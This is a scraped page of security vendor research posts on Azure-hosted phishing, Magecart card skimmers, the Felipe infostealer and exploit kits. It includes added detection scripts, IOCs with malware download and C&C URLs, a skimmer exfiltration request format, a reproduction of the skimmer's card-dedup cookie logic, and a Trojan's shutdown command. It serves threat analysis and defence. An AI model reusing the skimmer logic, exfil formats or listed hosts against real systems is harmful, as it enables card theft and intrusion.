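    ":friend!f@host PRIVMSG #chat :lol T_T that was funny",
    ":op!op@10.0.0.5 PRIVMSG abcdefg :shell whoamiT_Tscreenshot",
    "PING :irc.example.net",
]

if __name__ == "__main__":
    for alert in scan_irc_log(SAMPLE_LOG):
        print(alert)
```

The same `extract_saefko_commands` logic can be applied to the decoded payload of IRC packets from a network tap; the parser above only handles the line format, not TLS or the port-7000 server, which would need the traffic decrypted first.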
IOCs

MD5:
D9B0ECCCA3AF50E9309489848EB59924
C4825334DA8AA7EA9E81B6CE18F9C15F
952572F16A955745A50AAF703C30437C
4F2607FAEC3CB30DC8C476C7029F9046
7CCCB06681E7D62B2315761DBE3C81F9
5B516EAB606DC3CC35B0494643129058

Downloader URLs:
industry.aeconex[.]com/receipt-inv.zip
3.121.182[.]157/dwd/explorer.exe
3.121.182[.]157/dwd/vmp.exe
deqwrqwer.kl[.]com.ua/ex/explorer.exe
maprivate[.]date/dhl-miss%20craciun%20ana%20maria%20#bw20feb19.zip

Network URLs:
acpananma[.]com/love/server.php
3.121.182[.]157/smth/server.php
f0278951.xsph[.]ru/server.php
maprivate[.]date/server.php
Categories: Security Posts

Abusing Microsoft’s Azure domains to host phishing attacks

Zscaler Research - 1 hour 14 mins ago
Recently, the Zscaler ThreatLabZ team came across various phishing attacks hosted on Microsoft Azure custom domains. These sites are served under a Microsoft-issued SSL certificate, so they are unlikely to raise suspicion about their authenticity. We notified Microsoft, who quickly engaged to shut these sites down, while we took action to detect and block 2,000 phishing attempts from these domains over a six-week period. In this blog we describe the two most prominent vectors used and show several examples of the phishing pages.

The following figure shows the phishing hits hosted on the Azure domain (windows.net) and blocked by the Zscaler cloud.

Fig 1: Phishing hits using the Azure domains web.core.windows.net (green) and blob.core.windows.net (orange)

The following is the Whois lookup information for the windows.net domain.

Fig 2: Whois lookup info for the windows.net domain

For these phishing campaigns, the delivery vector was spam email.

CASE 1:

The attacker sends the user a spam email that appears to come from the user's own organization and says that seven emails have been quarantined. To review them, the user is told to log in with a work or school account.

Fig 3: Spam email with direct phishing link

If the user clicks the "view emails" button, the browser is redirected to an Outlook login phishing page (hxxps://onemailofice365(.)z13(.)web(.)core(.)windows(.)net/index(.)html).

Fig 4: Outlook login phishing page

Some users may be put off by the unfamiliar URL hosting the Outlook login page. To reassure them, the attackers rely on the SSL certificate that Microsoft issues for the Azure hostname, shown below. The padlock is genuine, but it only proves that the page is hosted on Azure, not that it belongs to Microsoft's login service.

Fig 5: SSL certificate page of the hosted phishing URL

The following figure shows the source code of the phishing page, which the attackers use to collect users' data.

Fig 6: Source code of the phishing page

Once the user enters login information, the form posts the credentials to a compromised domain operated by the cybercriminals.

Fig 7: Captured traffic showing the data sent to the attacker's site

CASE 2:

In this method, the attackers send a spam email with an attached HTML file disguised as a voice message. When the user opens the HTML file, it redirects to the phishing page hosted on the Azure domain.

Fig 8: Spam email using the double-extension trick

Fig 9: Outlook login phishing page reached from the "voice message"

In this campaign the attackers inject obfuscated JavaScript that checks the submitted credentials against those already in their database, so that duplicates are not stored twice.

Fig 10: Obfuscated JavaScript used to check submitted credentials against the attackers' database

The following figure shows the deobfuscated JavaScript. It validates the user's credential details and sends them to the attacker's server (hxxps://validr2vtap2l3eh544kb(.)azurewebsites(.)net/v20(.)php), which is itself hosted on another Azure domain (azurewebsites.net).

Fig 11: Deobfuscated JavaScript

Fig 12: User data is sent to the attacker's site using the function getValidatorURL()

Beyond the Outlook campaigns, we have seen other phishing campaigns on these Azure domains: Microsoft phishing, OneDrive phishing, Adobe document phishing, Blockchain phishing and more. The following figures show the different campaigns hosted on the Azure domain (windows.net).

Fig 13: Microsoft login phishing page

Fig 14: Adobe login phishing page

Fig 15: Blockchain login phishing page

Fig 16: OneDrive login phishing page

Conclusion

The Zscaler cloud blocked more than 2,000 phishing attacks over six weeks that were hosted on the Azure domain (windows.net). The following diagram shows the various kinds of phishing campaigns blocked by the Zscaler cloud.
Fig 17: Detected phishing hits

Fig 18: The Zscaler Zulu URL Risk Analyzer score for one of the phishing URLs

IOCs

039282fsd(.)z19(.)web(.)core(.)windows(.)net
3652adua38ea(.)z5(.)web(.)core(.)windows(.)net
378468459jjn(.)z19(.)web(.)core(.)windows(.)net
623623626638885047749469(.)z19(.)web(.)core(.)windows(.)net
86hoi2a8j592hf2(.)z14(.)web(.)core(.)windows(.)net
accounhostoutlook(.)z35(.)web(.)core(.)windows(.)net
accountsupdate(.)z22(.)web(.)core(.)windows(.)net
adobe111(.)z19(.)web(.)core(.)windows(.)net
appriver(.)z19(.)web(.)core(.)windows(.)net
azaman(.)blob(.)core(.)windows(.)net
bchwalletblockchain(.)z13(.)web(.)core(.)windows(.)net
bitcoinwalletrecovery(.)z13(.)web(.)core(.)windows(.)net
blockchainofficesupport(.)z13(.)web(.)core(.)windows(.)net
blockchainrecoverywalet(.)z13(.)web(.)core(.)windows(.)net
blockchaintradindinvest(.)z13(.)web(.)core(.)windows(.)net
businessdrivefilesharing(.)z33(.)web(.)core(.)windows(.)net
dlgeus(.)blob(.)core(.)windows(.)net
dlgneu(.)blob(.)core(.)windows(.)net
dlgweu(.)blob(.)core(.)windows(.)net
driveoffice-secondary(.)z13(.)web(.)core(.)windows(.)net
eastexch030serverdatanet(.)z13(.)web(.)core(.)windows(.)net
edustudioapp(.)z19(.)web(.)core(.)windows(.)net
exchangeonline80293745(.)z27(.)web(.)core(.)windows(.)net
finance51(.)z13(.)web(.)core(.)windows(.)net
fukshawefwe22(.)blob(.)core(.)windows(.)net
fundingmessan(.)z13(.)web(.)core(.)windows(.)net
gry1asdqw1(.)blob(.)core(.)windows(.)net
h0vbkkkeebweybv(.)z33(.)web(.)core(.)windows(.)net
hgnghhghkkdkdh(.)z13(.)web(.)core(.)windows(.)net
hp94549754083400j9302975(.)z21(.)web(.)core(.)windows(.)net
hsdv(.)blob(.)core(.)windows(.)net
linknec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net
linkp4klg1qkni76yoz8(.)z19(.)web(.)core(.)windows(.)net
lpdmsonline(.)blob(.)core(.)windows(.)net
macrofinancesoftonline(.)z14(.)web(.)core(.)windows(.)net
macrosoft0nlineoffice365(.)z13(.)web(.)core(.)windows(.)net
mailingofficeupdate(.)z14(.)web(.)core(.)windows(.)net
mailofficemicr0softvalid(.)z35(.)web(.)core(.)windows(.)net
mailofficesecurity(.)z13(.)web(.)core(.)windows(.)net
mailofficeveridiers(.)z33(.)web(.)core(.)windows(.)net
mailoutlookmcrosoftupdat(.)z11(.)web(.)core(.)windows(.)net
mailoutnewsecurity(.)z14(.)web(.)core(.)windows(.)net
mak17opa54vjxu8(.)z7(.)web(.)core(.)windows(.)net
mdj34598720843(.)z10(.)web(.)core(.)windows(.)net
microexchyz42nhszseheys(.)z13(.)web(.)core(.)windows(.)net
micromuze3rlokoyg(.)z14(.)web(.)core(.)windows(.)net
microrel00ukelukleqwkoxl(.)z13(.)web(.)core(.)windows(.)net
microsofbt50xjotm45wm7al(.)z11(.)web(.)core(.)windows(.)net
microsofd8f82gtrjyaajnsj(.)z11(.)web(.)core(.)windows(.)net
microsofdi3o152rpnnt2zr8(.)z11(.)web(.)core(.)windows(.)net
microsoffn4xwr5df3emnh1m(.)z11(.)web(.)core(.)windows(.)net
microsofn642b7o2un27wptm(.)z13(.)web(.)core(.)windows(.)net
microsofq2622c5r3wpfsdnp(.)z11(.)web(.)core(.)windows(.)net
microsofzwafvh6bisrici50(.)z11(.)web(.)core(.)windows(.)net
offic664ghdtsgdyddux(.)z13(.)web(.)core(.)windows(.)net
officcee(.)z13(.)web(.)core(.)windows(.)net
office365user37773773673(.)z19(.)web(.)core(.)windows(.)net
officedelist(.)z13(.)web(.)core(.)windows(.)net
officefiledata(.)z13(.)web(.)core(.)windows(.)net
onemailofice365(.)z13(.)web(.)core(.)windows(.)net
outlookloffice365user23k-secondary(.)z14(.)web(.)core(.)windows(.)net
outlookloffice365user25u-secondary(.)z33(.)web(.)core(.)windows(.)net
outlookloffice365user65t-secondary(.)z6(.)web(.)core(.)windows(.)net
outlookloffice365user65t(.)z6(.)web(.)core(.)windows(.)net
outlookloffice365userl6m(.)z13(.)web(.)core(.)windows(.)net
outlookofficecom(.)z33(.)web(.)core(.)windows(.)net
outlookproctionmail(.)z9(.)web(.)core(.)windows(.)net
outwebsignin2094598209(.)z21(.)web(.)core(.)windows(.)net
parmalat7(.)blob(.)core(.)windows(.)net
pjkiojxyfngsss(.)z13(.)web(.)core(.)windows(.)net
pssastd(.)blob(.)core(.)windows(.)net
rel00ukelukleqwkoxl(.)z6(.)web(.)core(.)windows(.)net
sams2948818388301(.)z13(.)web(.)core(.)windows(.)net
secureofficeportal(.)z19(.)web(.)core(.)windows(.)net
sharepo7(.)z22(.)web(.)core(.)windows(.)net
sharepointewk8xpzoywq7j(.)z19(.)web(.)core(.)windows(.)net
supportoffices365(.)z33(.)web(.)core(.)windows(.)net
thursday(.)z19(.)web(.)core(.)windows(.)net
ttsokaejqumuamreio(.)z6(.)web(.)core(.)windows(.)net
under12(.)z19(.)web(.)core(.)windows(.)net
user111777999973sdxc(.)z11(.)web(.)core(.)windows(.)net
user37377377733(.)z22(.)web(.)core(.)windows(.)net
user7779793e792782(.)z14(.)web(.)core(.)windows(.)net
user8877773737(.)z11(.)web(.)core(.)windows(.)net
usernamewebmailsingin(.)z14(.)web(.)core(.)windows(.)net
v83oybtn5zp5mmz(.)z14(.)web(.)core(.)windows(.)net
validatnec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net
voice88(.)z19(.)web(.)core(.)windows(.)net
voicserel00ukeluklwkoxl(.)z13(.)web(.)core(.)windows(.)net
webusermicr0softtonlinee(.)z33(.)web(.)core(.)windows(.)net
were12(.)z19(.)web(.)core(.)windows(.)net
weree(.)z6(.)web(.)core(.)windows(.)net
wimdowoutlkjxjy0846335f(.)z13(.)web(.)core(.)windows(.)net
yamma(.)z13(.)web(.)core(.)windows(.)net
zebra11(.)z19(.)web(.)core(.)windows(.)net
fiattt(.)blob(.)core(.)windows(.)net
funksha1(.)blob(.)core(.)windows(.)net
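The IOC list above has a shape worth turning into a detection: the customer-chosen account label is the first DNS label of a <label>.z<NN>.web.core.windows.net (static website) or <label>.blob.core.windows.net host, and a Microsoft or Adobe brand word in that label is a strong phishing signal, because Microsoft does not serve its own login pages from customer storage accounts. The block below is an added example written for this page, not tooling from the original post. It normalises the digit-for-letter substitutions seen in the list (micr0soft, macrosoft0nline), scores the label against a short brand-word list, and runs over a few constructed proxy log lines in an invented "timestamp client method url" format. Legitimate customers do host content on these domains, so treat a hit as a triage signal rather than a block decision.

```python
import re

# Azure static-website and blob endpoints. The account label is customer-chosen.
AZURE_STATIC = re.compile(r"^(?P<label>[a-z0-9-]+)\.z\d{1,2}\.web\.core\.windows\.net$", re.I)
AZURE_BLOB = re.compile(r"^(?P<label>[a-z0-9-]+)\.blob\.core\.windows\.net$", re.I)

# Brand and lure words drawn from the labels in the IOC list above (illustrative, not exhaustive).
BRAND_WORDS = [
    "microsoft", "office", "outlook", "onedrive", "sharepoint", "exchange", "adobe",
    "blockchain", "wallet", "voice", "mail", "login", "signin", "secure", "support",
    "validat", "update", "user",
]

# Undo common leet substitutions before matching: micr0soft -> microsoft, 0nline -> online.
SUBS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def normalise(label):
    return label.lower().translate(SUBS)


def brand_hits(label):
    n = normalise(label)
    return [w for w in BRAND_WORDS if w in n]


def assess(hostname):
    """Return None for hosts outside the two Azure patterns, otherwise a dict with the
    account label, endpoint kind and the brand words found in the label."""
    h = hostname.strip().lower().replace("(.)", ".").replace("[.]", ".")   # accept defanged input
    m = AZURE_STATIC.match(h) or AZURE_BLOB.match(h)
    if not m:
        return None
    label = m.group("label")
    hits = brand_hits(label)
    return {
        "host": h,
        "label": label,
        "kind": "static-web" if ".web." in h else "blob",
        "brand_words": hits,
        "suspicious": bool(hits),
    }


def scan_proxy_log(lines):
    """Alert on Azure-hosted URLs whose account label carries a brand word.
    Line format (constructed for this example): '<ts> <client> <method> <url>'."""
    alerts = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        host = parts[3].split("//", 1)[-1].split("/", 1)[0]
        result = assess(host)
        if result and result["suspicious"]:
            alerts.append(result)
    return alerts


# Constructed sample log, not real traffic. The third host is a plausible legitimate static site.
SAMPLE_LOG = [
    "2019-05-01T10:00:01Z 10.1.1.5 GET https://onemailofice365.z13.web.core.windows.net/index.html",
    "2019-05-01T10:00:02Z 10.1.1.5 GET https://macrosoft0nlineoffice365.z13.web.core.windows.net/",
    "2019-05-01T10:00:03Z 10.1.1.9 GET https://contoso-static-site.z5.web.core.windows.net/app.js",
    "2019-05-01T10:00:04Z 10.1.1.9 GET https://www.example.com/login",
]

if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_LOG):
        print(alert["host"], alert["brand_words"])
```

The misspelt "ofice" in the first sample host shows the limit of keyword matching: it is caught only because "mail" is also present. An edit-distance check against the brand list would close that gap at the cost of more false positives.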
Categories: Security Posts

Magecart activity and campaign enhancements

Zscaler Research - 1 hour 14 mins ago
Magecart is a hacker group known for skimming credit and debit card details by injecting malicious JavaScript into e-commerce sites. Back in September 2018, the Zscaler ThreatLabZ research team published a blog on Magecart activity that analyzed its attack methods and evasion tactics. This post follows up on that blog with recent activity we have seen and some enhancements to the campaign.

Magecart attack chain

In the recent campaign we noticed a change in the attack chain. One example is the use of heavily obfuscated JavaScript with encrypted data. Also, in some cases the malicious JavaScript is now injected directly into the compromised e-commerce site, whereas in earlier attacks it was loaded from a remote host.

Fig 1: Hits on compromised websites in the last three months

1. Injecting heavily obfuscated malicious JavaScript dynamically

The credit card stealer payload below is loaded dynamically when the victim presses the checkout button after filling the cart.

Fig 2: Heavily obfuscated malicious JavaScript injected on the checkout page

The ThreatLabZ team's smart crawler with heuristic detection shows that various JavaScript functions in the payload are obfuscated.

Fig 3: Crawler's heuristic detection

Fig 4: Malicious script after three levels of deobfuscation by the crawler

Analysis of the skimming toolkit

The script above looks for the keywords "onepage|checkout|onestep|firecheckout" in the URL and, if one is found, injects another script from hxxps://dnsden[.]biz/a.js.

Fig 5: Script injected from hxxps://dnsden[.]biz

The injected, obfuscated script a.js contains encrypted data that is decrypted with the RC4 algorithm at runtime.

Fig 6: Use of the RC4 algorithm in a.js

After RC4 decryption, the data in a.js injects the main skimming script, which extracts the victim's credit card details and sends them back to the attacker.

Encrypted data - w5rDvcOKwrnCnsKYcWHCgAcaUsOFVcOQXnZpw48KfjZ/CMObMMOiwq7Cm1XDvFDCl8KBEsKRE8Oyw6krWcK0wo1Xw7J+w6/DknoJasKVScKZOhzCoRI=

Decrypted data -

The universal.js script is also obfuscated and uses the same encryption scheme as a.js. After decryption it registers a handler on the form's change event and collects all the payment information the victim enters.

Fig 7: Collecting payment card details

Fig 8: Sending the victim's credit card details to the C&C

Fig 9: POST request with the stolen credit card details

info=Base64(stolen_data)&hostname=compromised_site&key=random_key

The stolen data includes billing and payment details.

Fig 10: Decoded stolen data

2. Injecting malicious JavaScript directly into the compromised site

Fig 11: Injection of malicious JavaScript hosted on the compromised e-commerce site

Fig 12: Malicious JavaScript hosted on a compromised site for skimming payment card details

Analysis of the skimming toolkit

The malicious JavaScript first checks for two cookies named "$s" and "$sent"; if they are set, their values are decoded and stored in variables. These cookie values are consulted each time payment card details are entered, and updated when the details are new.

Fig 13: Reading the values of the two cookies "$s" and "$sent"

To collect the payment card details, the script gathers the data from all input, select and textarea tags and runs a basic length check on the card details.

Fig 14: Validating the length of payment card details

After validating the card details, the script computes a hash of them and checks whether the same hash is present in the data retrieved earlier from the "$sent" cookie. If a matching hash is found, the payment details are dropped.

Fig 15: Checking the hash of the card details against the data retrieved earlier from the cookie

Each time new payment card details are entered, they are sent to the attacker and the hash of the details is appended to the "$sent" cookie; that cookie value is what decides whether the details being entered are new.

Fig 16: Value of the cookie "$sent" stored in the victim's browser

Decoding the Base64 value of the "$sent" cookie yields an array of MD5 hashes of the payment card details. By keeping hashes of the skimmed cards in a cookie (hashes, not encrypted card data), the attacker avoids sending the same card twice: every set of details is checked against the cookie, and only new cards are sent. For an investigator, the same cookie on a victim's browser is a count of how many distinct cards the skimmer captured there. After all the above checks pass, the payment card details are sent to the attacker-controlled site.

Fig 17: GET request with the stolen information

In a similar skimming toolkit, in addition to the cookie logic above, the attackers inject fake payment card fields into the compromised site and hide the legitimate fields once the victim selects credit card as the payment method.

Fig 18: Fake credit card fields and the malicious JavaScript file

Fig 19: HTML code for the fake credit card fields in the malicious script

Fig 20: Malicious script injecting the fake credit card fields

Fig 21: Above, injected credit card fields; below, legitimate credit card fields

The injected and legitimate fields look the same on the page, but the HTML input attributes (ID and type) differ: in the injected fields the card number ID is "_ccnumber" and the type is "text", while the legitimate card number field has the ID "credit-card-number" and the type "tel".
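The "$sent" dedup logic described above is simple enough to reproduce, and doing so gives an investigator a way to read the cookie back. The block below is an added example for this page, not the skimmer's code: it hashes a captured form the way the text describes (MD5 over the card details), keeps the hashes in a Base64-encoded array, drops a card whose hash is already present, and exposes a helper that counts distinct cards from a recovered cookie value. The exact serialisation is an assumption: the post only says the decoded cookie is an MD5 array, so a JSON list is used here, and the field order fed to MD5 is mine.

```python
import base64
import hashlib
import json


def card_fingerprint(fields):
    """MD5 over the captured form fields, in a fixed key order so the same card always
    hashes the same regardless of how the fields were collected. (Field order is an assumption.)"""
    canonical = "|".join(f"{k}={fields[k]}" for k in sorted(fields))
    return hashlib.md5(canonical.encode()).hexdigest()


def load_sent(cookie_value):
    """Decode the Base64 '$sent' cookie into its list of MD5 hashes (JSON list assumed)."""
    if not cookie_value:
        return []
    return json.loads(base64.b64decode(cookie_value).decode())


def save_sent(hashes):
    return base64.b64encode(json.dumps(hashes).encode()).decode()


def should_send(fields, sent_cookie):
    """Reproduce the dedup decision: (send to attacker?, updated '$sent' cookie value).
    A card whose hash is already in the cookie is dropped; a new one is appended."""
    seen = load_sent(sent_cookie)
    fp = card_fingerprint(fields)
    if fp in seen:
        return False, sent_cookie
    seen.append(fp)
    return True, save_sent(seen)


def count_skimmed_cards(sent_cookie):
    """Forensic helper: number of distinct cards a victim browser's '$sent' cookie records."""
    return len(set(load_sent(sent_cookie)))


if __name__ == "__main__":
    # Constructed input using public test card numbers, not real card data.
    card = {"cc_number": "4111111111111111", "cc_exp": "12/22", "cc_cvv": "123", "name": "A Person"}
    send, cookie = should_send(card, "")
    again, cookie = should_send(card, cookie)
    print(send, again, count_skimmed_cards(cookie))
```

Because the cookie holds hashes rather than card data, clearing it does not protect the victim; it only causes the next checkout to be exfiltrated again. The useful defensive readings are the count, and the presence of a "$sent" cookie at all on a checkout page that never set one.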
IOCs

dnsden[.]biz
jquery-bin[.]com/gate[.]php
lumbertrans[.]com/errors/default/gate[.]php
luxbagsgirl[.]com/errors/default/gate[.]php
jsreload[.]pw/gate[.]php
saterday-race[.]com/gate[.]php
jqueryextd[.]at/gate[.]php
routingzen[.]com/gate[.]php
mz-at-shop[.]de/errors/default/gate[.]php
93[.]187[.]129[.]249/gate[.]php
developer-js[.]info/gate[.]php
google-anaiytic[.]com/fonts[.]googleapis/gate[.]php
magento-analytics[.]com/gate[.]php
gtows[.]com

Compromised sites

shop.triggerbrothers[.]com[.]au
custommagnetsdirect[.]com
lumbertrans[.]com
sunbuggy[.]com
saterday-race[.]com
windblox[.]com
cakedecoratingsolutions[.]com[.]au
network-ed[.]com[.]au
adooq[.]com
mz-at-shop[.]de
reddotarms[.]com
sprucela[.]com
t[.]cltradingfl[.]com
worldcraftindustries[.]com
reallifecatholic[.]com
wbminternational[.]com
whistlerrides[.]ca
smartsilk[.]com
classictruckglass[.]com
oconnellsclothing[.]com/skin/
purefruittechnologies[.]com
cornerstone-arch[.]com
minitruckusa[.]com
magformers[.]com
ravishingcosmetics[.]com
alamoshoes[.]com
salonsavings[.]com
bathroompanelsuperstore[.]com
britishfitness[.]com
bumperworksonline[.]com
niftyconcept[.]com
decorprice[.]com

Conclusion

These developments in an ongoing campaign illustrate some of the ways attackers keep refining their methods for stealing sensitive information such as login credentials, bank or payment card details and personally identifiable information. The Magecart campaign has been active for a long time and continues to evolve and hone its techniques for stealing payment card information and related data. Zscaler ThreatLabZ actively tracks such campaigns and protects customers from these types of attacks.
Categories: Security Posts

Felipe, a new infostealer Trojan

Zscaler Research - 1 hour 14 mins ago
The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine. The files dropped by malware include: Win XP: %UserProfile%\Local Settings\Temp\vshost.exe %UserProfile%\Local Settings\Temp\explorer32.exe %UserProfile%\Local Settings\Temp\install2.bat %UserProfile%\Local Settings\Temp\infect.txt Win7/Win10: %UserProfile%\AppData\Local\Temp\vshost.exe %UserProfile%\AppData\Local\Temp\explorer32.exe %UserProfile%\AppData\Local\Temp\install2.bat %UserProfile%\AppData\Local\Temp\infect.txt The Felipe Trojan enumerates the system and tries to determine whether it has already been infected by checking the files vshost32.exe and vshost64.exe in the compromised system. The parent file downloads its payloads to %UserProfile%\AppData\Local\Temp\update2804. If this folder already exists, the malware deletes the folder and files inside. Once the folder is deleted, the malware will create a new folder with the same name in hidden mode.   When the update2804 folder is created, the malware downloads its different payloads within a gap of just 50 milliseconds. After downloading the payload, the malware copies it to a special directory temp folder in the system in hidden mode and executes it. First, it will execute the install2.bat file and then it will execute vshost.exe. 
Below is the code of install2.bat. The batch file makes registry changes responsible for the following:
- Run entries for vshost.exe and explorer32.exe to ensure persistence
- Disabling Windows Defender
- Bypassing UAC control
- Excluding the temp folder path from Windows Defender scanning

Vshost.exe checks the victim's bank cards by checking a card's length or the card's leading digits, such as:
- American Express: the number should begin with 34 or 37
- Visa: card length of 13 or 16
- Mastercard: card length of 16
- Discover: card length of 16 and beginning with 6011 or 65

Below is a snapshot of some of these instructions.

The following is the algorithm used to check the card's validity:
1. Process the digits from right to left.
2. Double every alternate digit, starting from the first.
3. Split a doubled digit into its digits if the result is greater than 10 (e.g., 28 = 2 + 8 (10) or 19 = 1 + 9 (10)).
4. Return the 10's complement of the total.
5. Finally, verify the checksum digit: the number is invalid if the checksum is not a multiple of 10.

Snapshot of the algorithm:

If the system is already infected, the malware looks for the filename infect.txt in the temp folder. If it is already there, it sends the data below; otherwise, it sends a request to the C&C to download the file infect.txt. It also sends the victim's system information and writes "infect" into the infect.txt file.

The Felipe Trojan takes a memory dump of processes by checking the memory addresses that can store data. It scans the process memory: whenever a process starts, the system allocates enough memory for its heap, stack, and other regions. However, Windows does not allocate one contiguous block; it allocates from whatever free memory is available in the user-mode address range. The following are the methods used for the memory dump:

GetSystemInfo(): Retrieves information about the system in a structure called SYSTEM_INFO. This structure also contains two members, minimumApplicationAddress and maximumApplicationAddress, which store the minimum and maximum addresses at which the system can allocate memory for user-mode applications.
VirtualQueryEx(): Retrieves information about a range of memory addresses and returns it in a structure named MEMORY_BASIC_INFORMATION. It tells us the extent of the memory region that starts at the specified address.
ReadProcessMemory(): Reads a number of bytes starting from a specific memory address.
OpenProcess(): Returns a handle to a specific process; the process must be opened before its memory can be read.
WriteProcessMemory(): Writes data to an area of memory in a specified process.

After the memory dump, the malware searches the dump for the bank card the victim has used and sends this information to the C&C. Below is a snapshot of it:

Encryption method for sending data to the C&C: The malware uses the Triple Data Encryption Standard (3DES) algorithm. The first step is to create a simple wrapper class that encapsulates the 3DES algorithm and stores the encrypted data as a base64-encoded string. That wrapper is then used to store private user data in a publicly accessible text file. 3DES is a symmetric algorithm, so the wrapper needs the same private key string to recover the decrypted string. Here, the malware uses "L%f@Y7Boolean4%()F$y" as the private key. For more info: https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/strings/walkthrough-encrypting-and-decrypting-strings

Sending data to the C&C:

The malware uses the free geoPlugin web service to determine the victim's system and location information. The following fields from the geoPlugin web service are used by the malware:
- System IP
- City
- Region code
- Country name

Timer Set: The malware sets a time in the program at which to shut down and restart the system on a specific day. In this example, if the time is between 5:06 a.m. and 6:09 a.m. on Friday, the system is shut down. The command used to shut down is:

Interaction.Shell("shutdown /r /t 0", AppWinStyle.MinimizedFocus, false, -1);

Switches:
/r: shut down and then restart the local computer
/t: time, in seconds, between the execution of the shutdown command and the actual shutdown or restart
AppWinStyle.MinimizedFocus: starts the program minimized and with focus

After the restart, the malware fetches hardware information from the victim's system, including the serial number and running processes. If the "explorer32.exe" process is not found among the running processes, the malware downloads it from the C&C and executes it from the temp folder to perform further malicious activities. It uses the GetAsyncKeyState() Win API to query the state of each key on the keyboard. From the return value of GetAsyncKeyState(), it can be determined whether the key is up or down at the time the function is called.

Network communication:

Indicators of Compromise:

Filename         MD5
vshost.exe       15CE8F849FFF4CC8675900EC838A93F9
down.exe         61B06E49D514F3DC5BE4F4EF08F6B43C
explorer32.exe   D912771C8CD5720AD835E08EB80A77B6
install2.bat     7D016A3BB29904A6E00161694FC6AB4E

Download URLs:
192.99.215[.]95/uploads
Inmemory[.]tech
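As an added example (not code from the Zscaler post or from the malware), the following Python applies the card checks described above from the defender's side: the same length/prefix rules and Luhn checksum let a DLP rule or a memory-dump triage script flag card numbers before they leave a host. The Amex length of 15 and the leading digits 4 (Visa) and 51-55 (Mastercard) are assumptions added here, not stated in the post, so that the two 16-digit rules do not overlap.

```python
"""Card-number detection mirroring the checks the post attributes to
vshost.exe, from the defender's side: a DLP filter or dump-triage script
uses the same brand rules and Luhn checksum. Added example, not the
malware's or the post's code."""
import re

# Brand rules as the post lists them. Added here as assumptions: the Amex
# length of 15, and leading digits 4 (Visa) / 51-55 (Mastercard), so the
# two 16-digit rules do not overlap. Rules are tried in this order.
BRAND_RULES = (
    ("American Express", (15,), ("34", "37")),
    ("Discover", (16,), ("6011", "65")),
    ("Mastercard", (16,), ("51", "52", "53", "54", "55")),
    ("Visa", (13, 16), ("4",)),
)

# Runs of 13-19 digits (spaces/dashes allowed) not inside a longer digit run.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def _luhn_sum(digits: str, double_first: bool) -> int:
    """Right-to-left digit sum with every second digit doubled; a doubled
    value above 9 is reduced to the sum of its digits (14 -> 1 + 4)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if (i % 2 == 0) == double_first:
            d = d * 2 - 9 if d > 4 else d * 2   # d*2-9 equals the digit sum
        total += d
    return total


def luhn_valid(number: str) -> bool:
    """Luhn check as the post describes it: the rightmost (check) digit is
    not doubled, and the total must be a multiple of 10."""
    return number.isdigit() and _luhn_sum(number, double_first=False) % 10 == 0


def check_digit(partial: str) -> int:
    """The 10's complement step: the digit that makes `partial` Luhn-valid
    once appended (appending it shifts `partial` into the other parity)."""
    return (10 - _luhn_sum(partial, double_first=True) % 10) % 10


def classify(number: str):
    """Brand name for a Luhn-valid number that matches a rule, else None."""
    if not luhn_valid(number):
        return None
    for brand, lengths, prefixes in BRAND_RULES:
        if len(number) in lengths and number.startswith(prefixes):
            return brand
    return None


def find_cards(buffer: str):
    """Scan a text buffer (strings from a process dump, a log line, an HTTP
    body) and return (brand, digits) for every candidate that classifies."""
    hits = []
    for m in CANDIDATE.finditer(buffer):
        digits = re.sub(r"[ -]", "", m.group(0))
        brand = classify(digits)
        if brand:
            hits.append((brand, digits))
    return hits


# Constructed sample resembling fragments from a process dump. The numbers
# are widely published test numbers, not real cards; two are not Luhn-valid.
SAMPLE_DUMP = (
    "cardnumber=4111111111111111&exp=1223\x00\x00"
    "name=ALICE EXAMPLE\x00 3782 822463 10005 \x00"
    "order=1234567890123456 total=5555555555554444\x00"
    "6011111111111117 ref=4111111111111112"
)

if __name__ == "__main__":
    for brand, digits in find_cards(SAMPLE_DUMP):
        print(brand, digits[:6] + "*" * (len(digits) - 10) + digits[-4:])
```

Running the module prints each detected brand with the number masked; only the four Luhn-valid test numbers in the constructed buffer are reported.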
Categories: Security Posts

Top exploit kit activity roundup – Spring 2019

Zscaler Research - 1 hour 14 mins ago
This is the tenth in a series of quarterly roundups by the Zscaler ThreatLabZ research team in which we collect and analyze the activity of the top exploit kits over the last three months. Exploit kits (EKs) are rapidly deployable software packages designed to leverage vulnerabilities in web browsers and deliver a malicious payload to a victim's computer. Authors of EKs offer their services for a fee, distributing malware for other malicious actors. What follows are highlights from the EK activity we observed during the last quarter.

RIG EK

RIG EK has continued to be active through the quarter. Though EK activity has declined overall, RIG EK activity has been persistent. We saw no changes in the kit's behavior compared to the previous quarter. Below we can see the hits for RIG EK activity.

Figure 1: RIG EK hits from 1 March 2019 to 20 May 2019.

The geographical distribution of RIG EK hits is shown below.

Figure 2: RIG EK heat map showing infection regions.

One instance of RIG EK activity can be seen below.

Figure 3: RIG EK infection cycle.

The obfuscated JavaScript on the landing page is shown below.

Figure 4: RIG EK landing page obfuscated JavaScript.

We observed the use of two malicious scripts on the landing page. The first exploits CVE-2016-0189, a Scripting Engine Memory Corruption Vulnerability targeting IE 11 and below. The second exploits CVE-2018-8174, a Windows VBScript Engine Remote Code Execution vulnerability targeting Windows 10, 7, and 8.1, and Windows Server 2008, 2012, and 2016. We also saw the use of the Adobe Flash exploit CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player version 28.0.0.161 and earlier. The snippet of code targeting CVE-2018-4878 can be seen in the decompiled Flash file below.

Figure 5: Decompiled Flash exploit in the RIG EK cycle (CVE-2018-4878).

The malware payloads seen with RIG EK this quarter belonged to the SmokeLoader and AZORult families.

Underminer EK

